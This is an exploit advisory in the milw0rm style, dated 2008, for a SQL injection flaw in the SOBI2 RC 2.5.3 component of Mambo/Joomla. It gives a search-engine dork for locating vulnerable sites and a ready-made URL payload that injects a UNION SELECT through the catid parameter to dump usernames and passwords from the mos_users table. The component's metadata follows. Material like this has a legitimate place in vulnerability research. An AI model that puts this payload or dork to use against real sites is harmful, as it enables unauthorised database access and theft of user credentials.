Mambo Component SOBI2 RC 2.5.3 SQL Injection Vulnerability

#########################################################################
#
# joomla SQL Injection(com_sobi2)
#
#########################################################################
#
# AUTHOR : DamaR
#
# HOME : http://No =)

#########################################################################
#
# DorKs 1 : allinurl: "com_sobi2"
#
########################################################################
EXPLOIT :

http://site.com/path/index.php?option=com_sobi2&Itemid=27&catid=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/**/from/**/mos_users/*


#########################################################################
# DamaR                    By.Damar@Hotmail.Com
#########################################################################+

side notes:
	<name>SOBI2</name>
	<author>Sigrid & Radek Suski</author>
	<creationDate>2 November 2006</creationDate>
	<copyright>(C) 2006 Sigsiu.NET. All rights reserved.</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

	<authorEmail>info@sigsiu.net</authorEmail>
	<authorUrl>http://www.Sigsiu.NET</authorUrl>
	<version>RC 2.5.3</version>
	<description></description>

# milw0rm.com [2008-02-02]